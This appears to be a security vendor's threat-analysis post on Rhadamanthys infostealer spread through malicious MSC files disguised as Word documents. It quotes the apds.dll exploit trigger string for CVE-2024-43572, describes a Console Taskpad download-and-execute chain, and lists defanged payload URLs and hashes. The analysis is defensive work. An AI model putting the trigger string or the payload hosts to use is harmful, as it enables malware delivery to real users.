AhnLab SEcurity intelligence Center (ASEC) has confirmed that Rhadamanthys Infostealer is being distributed as a file with the MSC extension. The MSC extension is an XML-based format that is executed by the Microsoft Management Console (MMC), and it can register and execute various tasks such as script code and command execution, and program execution.

There are two types of MSC malware: one exploits the vulnerability of apds.dll (CVE-2024-43572), and the other executes the “command” command using Console Taskpad. The distribution of MSC malware has been on the rise since June 2024, with the type that exploits the vulnerability of apds.dll (CVE-2024-43572) being the most prevalent. The recently discovered MSC file belongs to the type that uses Console Taskpad. More details about MSC malware can be found in the previous blog post.

 

1. Exploiting the Vulnerability of apds.dll (CVE-2024-43572)

 

This involves finding the resource named “redirect.html” in apds.dll and using its function. To trigger this type in MSC, the syntax “res://apds.dll/redirect.html?target=javascript:eval(external.Document.ScopeNamespace.GetRoot().Name)” is required.

Figure 1. Part of the MSC internal payload exploiting the vulnerability in apds.dll

 

The “res://” protocol allows access to resources in local files. In this case, it accesses the “redirect.html” resource in apds.dll. This resource performs a regular expression search to find the code after “target=”, and then executes this code using “.exec()”. In other words, the code is executed directly within the vulnerable DLL, not by MMC.

Figure 2. Content of the “redirect.html” resource

 

2. Using Console Taskpad

 

This method involves interpreting and executing the commands that exist between <ConsoleTaskpads> and </ConsoleTaskpads>. Unlike the first method, this involves executing commands within MMC. This does not involve executing code within a DLL like the first method, but instead involves using features supported by MMC, allowing only simple commands and executing specific files.

Figure 3. Internal payload of MSC using Console Taskpad

 

The MSC file is disguised as an MS Word document. As shown in Figure 4, when the “Open” button is clicked, it downloads and executes a PowerShell script from an external source. The downloaded PowerShell script contains an EXE file (Rhadamanthys). This file is created and executed under the %LocalAppData% (C:\Users\[Username]\AppData\Local) directory with the name “eRSg.mp3”.

Figure 4. Icon of the malicious MSC file

Figure 5. Downloaded PowerShell script

 

The distribution of MSC malware has been on the rise since June 2024. While the type that exploits the vulnerability of apds.dll (CVE-2024-43572) is no longer being executed due to the vulnerability patch, the type that uses Console Taskpad does not exploit the vulnerability, so it can still be used in a normal manner. Thus, users need to be extra cautious when executing MSC files from an unknown source.

MD5

560024efca8e5730dc4decf2e2c252db

7b26a25d7bf2be6fdc2810ba5f519b4a

9b738d877e6590b40c2784be10c215d7

URL

https[:]//daddychill[.]nl[:]1537/77950e0740519/udpne49n[.]du0i8

https[:]//oshi[.]at/SdUr/TSWY[.]txt